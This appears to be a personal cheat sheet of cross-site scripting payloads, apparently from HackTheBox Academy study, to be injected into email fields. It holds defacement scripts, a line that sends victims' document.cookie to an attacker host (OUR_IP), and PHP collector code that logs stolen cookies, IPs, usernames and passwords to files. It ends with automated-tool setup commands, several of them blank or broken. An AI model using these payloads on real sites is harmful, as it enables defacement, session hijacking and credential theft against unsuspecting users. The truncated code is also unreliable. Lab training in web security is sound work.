Payloads Tips and Tricks

List of useful payloads, tips and tricks about XSS gathered with time

To be tried and inserted in email fields


Payloads List


Attacker can take advantage of stored XSS to change the look of the web application and cause damages to the company facing website. Attackers may deface a website to prove the compromise on the target. Website defacement can cause important impacts on a company business and affairs.

# Change page title
<script>document.title = 'HackTheBox Academy'</script>

# Change Background
<script> = "#141d2b"</script>
<script>document.body.background = ""</script>

# Change page text
document.getElementById("todo").innerHTML = "New Text"
document.getElementsByTagName('body')[0].innerHTML = "New Text"

Session hijacking payloads

These payloads can be writted in a script.js file hosted on the attacker web server.

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

PHP payloads for session hijacking

This payload writes down the victim cookies along with the associated IP into a file. This payload can be saved in a index.php file that is hosted on the attacker web server.

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");

PHP payloads to steal credentials

This payload looks for the username and password parameters in the URL and if exists it will write the username and password entered by the victim in a file named creds.txt. Then, it will redirect the user to a legitimate page.

if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");


Automated XSS tools

git clone
cd XSStrike
pip install -r requirements.txt
python -u ""

Last updated